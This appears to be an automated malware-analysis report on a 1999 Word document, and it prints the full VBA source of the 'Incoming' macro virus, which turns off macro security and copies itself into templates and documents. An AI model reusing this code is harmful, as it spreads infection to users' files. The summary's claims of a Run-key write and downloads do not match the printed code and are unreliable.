Office (OLE) malware analysis — malicious · a379d8d74845c888

MALICIOUS

Office (OLE)

41.0 KB Created: 1999-09-16 05:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 6d9c915a5cda3020a36155c450be06b0 SHA-1: 69fc6cf26da2a5914ec5f81b683247cae98f234a SHA-256: a379d8d74845c888c75a60327787f35781c7f400c8e2068b96464c8f653eec7f

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, as indicated by multiple heuristic firings including ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cash-1'. The 'Document_Open' macro attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy. The macro also manipulates Office security settings to facilitate its execution and potentially download additional payloads, though the full extent is truncated. The document body presents a benign-looking code snippet to lure the user into enabling macros.

Heuristics 3

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1894 bytes
SHA-256: `5572a85d807a0d5acbcd3a21e77530da2c6031288cde963499730423892e918d`
Detection ClamAV: Doc.Trojan.Cash-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Incoming" Attribute VB_Base = "1Normal.Incoming" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule yup = Word.ActiveDocument.Characters.Count: s = "'" + Str(yup) ab.replaceline 27, s End Sub Private Sub Document_Close() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then: CommandBars("Macro").Controls("Security...").Enabled = 0: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.ConfirmConversions = 0 Options.SaveNormalPrompt = 0 Options.VirusProtection = 0 CommandBars("Tools").Controls("Macro").Enabled = 0 Set d = New DataObject Set a = NormalTemplate.VBProject.VBComponents(1): Set ab = a.CodeModule Set c = ActiveDocument.VBProject.VBComponents(1): Set cd = c.CodeModule d.SetText Incoming.VBProject.VBComponents(1).CodeModule.lines(1, Incoming.VBProject.VBComponents(1).CodeModule.countoflines) If Not a.Name = "Incoming" Then ab.deletelines 1, ab.countoflines: ab.insertlines 1, d.GetText: a.Name = "Incoming" ElseIf Not c.Name = "Incoming" Then cd.deletelines 1, cd.countoflines: cd.insertlines 1, d.GetText: c.Name = "Incoming" If Day(Now) = 16 Then: MsgBox "Chaos," & vbCr & "Panic," & vbCr & "Disorder," & vbCr & "My work here is done!!", vbOKOnly, "Incoming" End If yup = Word.ActiveDocument.Characters.Count: s2 = "'" + Str(yup) If ab.lines(27, 1) = s2 Then: ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub ' 1236 ' Word 97/2K Incoming [ Psyclone X /DVC ]

Open this report in the interactive analyzer, or submit your own file for analysis.